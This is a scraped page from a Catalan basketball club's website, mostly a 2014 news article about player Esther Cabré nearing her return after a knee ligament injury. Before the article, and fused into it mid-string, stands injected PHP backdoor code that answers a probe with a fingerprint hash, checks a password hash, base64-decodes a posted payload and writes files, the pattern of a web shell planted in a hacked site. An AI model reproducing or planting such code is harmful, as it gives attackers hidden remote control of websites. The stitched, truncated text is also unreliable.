function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Esther Cabré, molt a prop de reaparèixer en competició - Tgn Bàsquet Club -

Esther Cabré, molt a prop de reaparèixer en competició

By
Updated: novembre 26, 2014

L’aler del Nemser TGN Bàsquet Esther Cabré ja veu la llum al final del túnel. La jugadora lila, que encara no ha pogut jugar ni un minut aquesta temporada, és molt a prop de reaparèixer en competició després de deu mesos de baixa. Cabré fa més d’una setmana que entrena al mateix ritme que la resta de l’equip i fa els entrenaments complets i sembla que la seva tornada a les pistes serà ben aviat. L’aler es va lesionar el 8 de febrer d’enguany en el partit que el Nemser TGN Bàsquet va jugar a casa contra el Sabadell (42-60). “Vaig fer un moviment i em vaig adonar que el genoll em fallava. Em va fer mal però vaig pensar que havia estat només un mal gest””, va dir aleshores. En aquell moment ni ella ni ningú pensava que estaria de baixa tant de temps però la resonància magnètica va revelar que la jugadora patia un trencament del lligament creuat anterior que la va deixar fora de l’equip pel que restava de temporada i tot l’inici de l’actual.

La recuperació d’Esther Cabré, però, ha anat millor del que es podia esperar, sobretot en la seva progressió física quan va començar a entrenar amb el grup. De moment, però, Cabré no jugarà aquest diumenge contra el Viladecans (12.30 h) -els partits a casa es juguen els dissabtes a dos quarts de set, però aquest cap de setmana la presentació dels equips, que es farà just abans del matx (11 h) ha variat l’horari-  però podria fer-ho en la propera jornada.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *